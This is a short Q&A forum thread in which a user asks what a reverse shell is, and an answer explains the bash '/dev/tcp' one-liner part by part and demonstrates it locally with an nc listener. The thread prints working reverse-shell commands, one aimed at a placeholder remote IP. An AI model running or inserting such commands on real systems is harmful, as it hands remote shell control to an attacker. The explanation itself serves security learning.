SoulRebel February 2016

What is reverse shell?

Could someone explain to me what is reverse shell about and in what cases are we supposed to use it? I found this http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet regarding the same, what is the meaning of:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Answers


Kay February 2016

It's a(n insecure) remote shell introduced by the target. That's the opposite of a "normal" remote shell, which is introduced by the source.

Let's try it with localhost instead of 10.0.0.1:

  • Open two tabs in your terminal.

    1. open TCP port 8080 and wait for a connection:

      nc localhost -lp 8080
      
    2. Open an interactive shell, and redirect the iostreams to a TCP socket:

      bash -i >& /dev/tcp/localhost/8080 0>&1
      

      where

      • bash -i "If the -i option is present, the shell is interactive."
      • >& "This special syntax redirects both stdout and stderr to the specified target."
      • (argument for >&) /dev/tcp/localhost/8080 is a TCP client connection to localhost:8080.
      • 0>&1 redirects file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is also used to read input.

      Cf. http://wiki.bash-hackers.org/syntax/redirection

  • Rejoice as you have a prompt in tab 1.
  • Now imagine not using localhost, but some remote IP.

Post Status

Asked in February 2016
Viewed 3,866 times
Voted 7
Answered 1 times
